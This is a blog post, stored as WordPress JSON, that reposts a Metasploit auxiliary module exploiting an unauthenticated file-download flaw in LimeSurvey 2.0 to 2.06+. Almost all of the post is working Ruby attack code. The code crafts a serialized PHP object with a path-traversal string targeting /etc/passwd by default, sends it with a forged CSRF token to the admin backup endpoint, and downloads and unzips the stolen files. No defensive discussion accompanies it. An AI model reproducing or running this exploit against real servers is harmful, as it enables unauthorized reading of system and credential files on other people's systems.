{"id":59309,"date":"2024-09-01T00:49:52","date_gmt":"2024-08-31T21:49:52","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180855\/limesurvey_file_download.rb.txt"},"modified":"2024-09-01T00:49:52","modified_gmt":"2024-08-31T21:49:52","slug":"limesurvey-unauthenticated-file-download","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/limesurvey-unauthenticated-file-download\/","title":{"rendered":"Limesurvey Unauthenticated File Download"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

# for extracting files
require ‘zip’<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Limesurvey Unauthenticated File Download’,
‘Description’ => %q{
This module exploits an unauthenticated file download vulnerability
in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded
as a ZIP and unzipped automatically, thus binary files can be downloaded.
},
‘Author’ => [
‘Pichaya Morimoto’, # Vulnerability Discovery
‘Christian Mehlmauer’ # Metasploit module
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘URL’, ‘https:\/\/sec-consult.com\/vulnerability-lab\/advisory\/multiple-critical-vulnerabilities-in-lime-survey\/’],
[‘URL’, ‘https:\/\/www.limesurvey.org\/blog\/22-security\/136-limesurvey-security-advisory-10-2015’],
[‘URL’, ‘https:\/\/github.com\/LimeSurvey\/LimeSurvey\/compare\/2.06_plus_151014…2.06_plus_151016?w=1’]],
‘DisclosureDate’ => ‘2015-10-12’
)
)<\/p>\n

register_options(
[
Opt::RPORT(80),
OptString.new(‘TARGETURI’, [true, ‘The base path to the limesurvey installation’, ‘\/’]),
OptString.new(‘FILEPATH’, [true, ‘Path of the file to download’, ‘\/etc\/passwd’]),
OptInt.new(‘TRAVERSAL_DEPTH’, [true, ‘Traversal depth’, 15])
])
end<\/p>\n

def filepath
datastore[‘FILEPATH’]end<\/p>\n

def traversal_depth
datastore[‘TRAVERSAL_DEPTH’]end<\/p>\n

def payload
traversal = ‘\/..’ * traversal_depth
file = “#{traversal}#{filepath}”
serialized = ‘a:1:{i:0;O:16:”CMultiFileUpload”:1:{s:4:”file”;s:’ + file.length.to_s + ‘:”‘ + file + ‘”;}}’
Rex::Text.encode_base64(serialized)
end<\/p>\n

def unzip_file(zipfile)
zip_data = Hash.new
begin
Zip::File.open_buffer(zipfile) do |filezip|
filezip.each do |entry|
zip_data[::File.expand_path(entry.name)] = filezip.read(entry)
end
end
rescue Zip::Error => e
print_error(“Error extracting ZIP: #{e}”)
end
return zip_data
end<\/p>\n

def run
csrf_token = Rex::Text.rand_text_alpha(10)<\/p>\n

vars_post = {
‘YII_CSRF_TOKEN’ => csrf_token,
‘destinationBuild’ => Rex::Text.rand_text_alpha(5),
‘datasupdateinfo’ => payload
}<\/p>\n

res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri, ‘index.php’, ‘admin’, ‘update’, ‘sa’, ‘backup’),
‘cookie’ => “YII_CSRF_TOKEN=#{csrf_token}”,
‘vars_post’ => vars_post
})<\/p>\n

if res && res.code == 200 && res.body && res.body.include?(‘Download this file’)
match = res.body.match(%r{<div class=”updater-background”>\\s+<p class=”success ” style=”text-align: left;”>\\s+<strong>[^<]+<\/strong>\\s+<br\/>\\s+([^<]+)<br\/>\\s+<a class=”btn btn-success” href=”([^”]+)” title=”Download this file”>Download this file<\/a>})
if match
local_path = match[1]download_url = match[2]print_status(“File saved to #{local_path}”)
print_status(“Downloading backup from URL #{download_url}”)<\/p>\n

res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => download_url
})<\/p>\n

if res && res.code == 200
unzipped = unzip_file(res.body)<\/p>\n

unzipped.each do |filename, content|
print_good(“Filename: #{filename}”)
print_good(content)<\/p>\n

path = store_loot(
‘limesurvey.http’,
‘application\/octet-stream’,
rhost,
content,
filename
)
print_good(“File saved in: #{path}”)
end
else
print_error(‘Failed to download file’)
end
else
print_error(‘Failed to download file’)
end
else
print_error(‘Failed to download file’)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## # for extracting filesrequire ‘zip’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,‘Name’ => ‘Limesurvey Unauthenticated File Download’,‘Description’ => %q{This module exploits an unauthenticated file download vulnerabilityin limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloadedas a ZIP and unzipped automatically, thus …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59309","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59309"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59309\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}